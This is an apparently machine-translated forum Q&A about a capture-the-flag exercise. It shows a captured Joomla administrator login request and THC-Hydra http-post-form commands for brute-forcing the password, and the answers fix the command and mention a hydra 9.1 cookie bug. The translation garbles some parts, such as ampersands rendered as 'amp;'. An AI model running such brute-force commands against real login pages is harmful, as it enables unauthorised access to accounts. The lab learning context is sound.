Блог

Главная - Вопросы по программированию - Не удается успешно использовать hydra, http-post-форма со значением cookie

Не удается успешно использовать hydra, http-post-форма со значением cookie

#hydra #ctf

#гидра #ctf #hydra

Вопрос:

Я делаю некоторый CTF и наткнулся на проблему с Hydra при попытке использовать его для запроса post. Я уже знаю, как это решить, но у меня возникли проблемы с Hydra.

Усвоенный из отрыжки

 POST /administrator/index.php HTTP/1.1
Host: 10.10.10.126    
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8   
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate 
Referer: http://10.10.10.126/administrator/index.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 109  
Connection: close    
Cookie: eaa83fe8b963ab08ce9ab7d4a798de05=0mvnlo2q2792fi1rortceo4or3; 2b01af51830ca9615359108de04d9ca1=bpsnvqrm2mf6hc5akvnr8ftdu1  
Upgrade-Insecure-Requests: 1

 
username=adminamp;passwd=testamp;option=com_loginamp;task=loginamp;return=aW5kZXgucGhwamp;71800a4b802098aac7f3bbd7e49a8665=1

Я много гуглил и безуспешно пробовал несколько разных способов.
Что я сделал, так это следующее:

 hydra -l jonah -P test.txt 10.10.10.126 http-post-form "/administrator/index.php:username=^USER^amp;passwd=^PASS^amp;option=com_loginamp;task=loginamp;return=aW5kZXgucGhwamp;97f7e29809c1606df34ec3df81b10860=1:S=Warning:H=Cookie: eaa83fe8b963ab08ce9ab7d4a798de05=0mvnlo2q2792fi1rortceo4or3; 2b01af51830ca9615359108de04d9ca1=bpsnvqrm2mf6hc5akvnr8ftdu1"

-j это правильное имя пользователя и

-P test.txt содержит правильный пароль

Может кто-нибудь сказать мне, что не так с моим запросом и почему он не увенчался успехом?

Ответ №1:

В версии 9.1 hydra обнаружена ошибка, и она не отправит запрос, если вы предоставите ей cookie. 9.1 — это версия, которая по-прежнему поставляется с kali, поэтому вам необходимо обновить ваш hydra, и это должно устранить проблему.

Ответ №2:

Попробуйте использовать подобное и замените <неверный пароль> чем-то вроде «неверный пароль».

 hydra -l jonah -P test.txt 10.10.10.126 http-post-form "/administrator/index.php:username=^USER^amp;passwd=^PASS^amp;option=com_loginamp;task=loginamp;return=aW5kZXgucGhwamp;97f7e29809c1606df34ec3df81b10860=1:<IncorrectVerbiage>"